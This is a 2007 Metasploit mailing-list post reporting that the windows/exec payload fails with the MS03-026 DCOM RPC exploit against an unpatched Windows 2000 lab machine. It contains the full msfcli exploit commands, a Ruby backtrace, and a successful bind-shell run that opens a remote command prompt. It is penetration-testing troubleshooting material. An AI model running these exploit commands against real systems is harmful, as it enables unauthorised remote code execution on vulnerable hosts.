Metasploit mailing list archives
Re: windows/exec Payload problems.
From: a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:34:19 +0000
Hello, I was trying to work with the command execute payload and I can't seem to get it to work. I tested it on both 2.7 and 3.0 beta3 updated via SVN. I am using ms03_026_dcom (the dcom RPC exploit). The system I am testing against is windows 2000 professional without any SPs installed. Here is a sample of output using msfcli from 3.0 ------------------------------------------------------------------- root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/exec" CMD="md abc" RHOST="192.168.0.17" E [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Sending exploit ... Exploit failed: end of file reached Backtrace: ./lib/rex/io/stream.rb:58:in `sysread' ./lib/rex/io/stream.rb:58:in `read' ./lib/rex/io/stream.rb:181:in `get_once' ./lib/rex/proto/dcerpc/client.rb:150:in `read' ./lib/rex/proto/dcerpc/client.rb:230:in `call' ./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call' /pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in `exploit' ./lib/msf/core/exploit_driver.rb:189:in `job_run_proc' ./lib/msf/core/exploit_driver.rb:152:in `run' ./lib/msf/base/simple/exploit.rb:118:in `exploit_simple' ./lib/msf/base/simple/exploit.rb:127:in `exploit_simple' ./msfcli:153 root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E [*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Sending exploit ... [*] Sending stage (474 bytes) [*] The DCERPC service did not reply to our request [*] Command shell session 1 opened (192.168.0.21:58937 -> 192.168.0.17:4444) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> ------------------------------------------------------------------------- As can be seen, other payloads like bind shell work fine. Also one other strange thing that I noticed is that with 2.7 I can repeatedly exploit the same box and the service crashes after several successful attempts while with 3.0, I only get one attempt and after one successful attempt, the service no longer seems to be exploitable. Am I doing something wrong here or is it a bug? I am sorry if someone else already has pointed to this. Regards, Kashif.
Current thread:
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)